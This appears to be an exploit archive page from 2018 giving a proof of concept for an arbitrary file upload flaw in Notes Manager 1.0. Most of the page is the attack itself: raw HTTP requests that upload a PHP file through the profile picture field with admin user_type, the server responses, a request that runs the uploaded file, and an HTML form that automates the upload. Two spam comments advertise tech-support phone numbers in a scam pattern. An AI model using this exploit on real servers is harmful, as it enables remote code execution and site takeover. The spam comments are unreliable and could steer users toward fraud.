Twenty Year Anniversary

Notes Manager 1.0 Shell Upload

Notes Manager 1.0 Shell Upload
Posted Oct 31, 2018
Authored by Ihsan Sencan

Notes Manager version 1.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
MD5 | 2c1e7646664db47fa555768925253c58

Notes Manager 1.0 Shell Upload

Change Mirror Download
# Exploit Title: Notes Manager 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.webprojectbuilder.com/item/notes-management
# Software Link: https://astuteinternet.dl.sourceforge.net/project/notes-manager/notes_management.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC:
# 1)
# http://localhost/[PATH]/user/add_edit
#
# http://localhost/[PATH]/assets/images/[FILE]
#
POST /[PATH]/user/add_edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------95839047417419306891039500038
Content-Length: 737
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="fileOld"
g_1540845821.php
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="users_id"
1
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="user_type"
admin
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="submit1"
-----------------------------95839047417419306891039500038--
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 21:10:19 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ci_session=00cf0a180900e0b110b84343140d8f1c77a68493; expires=Mon, 29-Oct-2018 23:10:19 GMT; Max-Age=7200; path=/; HttpOnly
refresh: 0;url=http://localhost/[PATH]/user/login
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

GET /[PATH]/assets/images/phpinfo_1540847419.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=00cf0a180900e0b110b84343140d8f1c77a68493
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 21:10:42 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC:
# 2)
# http://localhost/[PATH]/user/add_edit
#
<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/user/add_edit">
<input id="fileUpload" name="profile_pic" type="file"><br>
<input name="fileOld" value="" type="hidden">
<input name="users_id" value="1" type="hidden">
<input name="user_type" value="admin" type="hidden">
<button name="submit1" type="submit" ">Ver Ayari</button>
</form>
</body>
</html>



Comments (2)

RSS Feed Subscribe to this comment feed
harry01

In many cases, you need to explore and install genuine driver matching to the model number of the printer, but in this situation, where you face the trouble from displaying the error message Printer is offline in Windows 10 the culprit is settings. If you are facing any problem related to Printer Issues please visit:- www.brotherprintersupportnumber.com/blog/how-to-fix-bro…

Comment by harry01
2018-11-02 12:18:07 UTC | Permalink | Reply
shramradhe

We are well known at Microsoft Support Number +1-888-964-8356 for troubleshooting various kinds of tech issues such as set up & configuration, installation & downloading, installation, reinstallation, updates problems and many others, with the latest of remote access technology, we can detect actual problems and resolve them with right technical solutions. Our experts are very experienced for solving such types of technical problems easily. Visit us: - www.officehelplinenumber.com

Comment by shramradhe
2018-11-26 06:18:09 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close